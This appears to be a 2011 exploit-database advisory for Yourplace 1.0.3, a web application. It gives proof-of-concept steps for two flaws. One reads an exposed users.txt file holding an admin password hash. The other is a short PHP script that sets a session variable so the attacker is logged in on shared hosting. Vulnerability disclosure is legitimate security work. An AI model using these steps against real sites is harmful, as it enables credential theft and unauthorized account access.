Yourplace 1.0.3 Credentials Dislcosure and Session Poisoning Vulnerabilities

2012.07.24

Credit: condis

Risk: High

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-200

Yourplace 1.0.3 Credentials Dislcosure && Session Poisoning Vulnerabilities
by condis
04.10.2011
download : http://sourceforge.net/projects/yourplace/
1. Credentials Disclosure Vulnerability
Proof of Concept:
http://host.tld/user/info/users.txt
You'll see something like:
admin $1$DG3.QA2.$6WzBBJvwvtqzUBxZcD.dC1
Description:
There is no .htaccess rule which could deny access to users.txt.
Also it's pure stupidness to put sensitive data into txt files...
User password is encrypted using crypt() function where password
is user defined password, and salt is his login.
2. Session Poisoning Vulnerability
To exploit this vulnerability You must have account on server with
attacked application i.e.: in other domain (shared hostings)
1. Visit site you want to attack.
2. Create simple script:
<?php
session_start();
$_SESSION['username'] = true;
?>
save it on Your account, and execute via browser.
3. Refresh browser card with attacked site
4. You're logged in ... nice and easy, lulz...

References:

http://sourceforge.net/projects/yourplace/

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Yourplace 1.0.3 Credentials Dislcosure and Session Poisoning Vulnerabilities

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.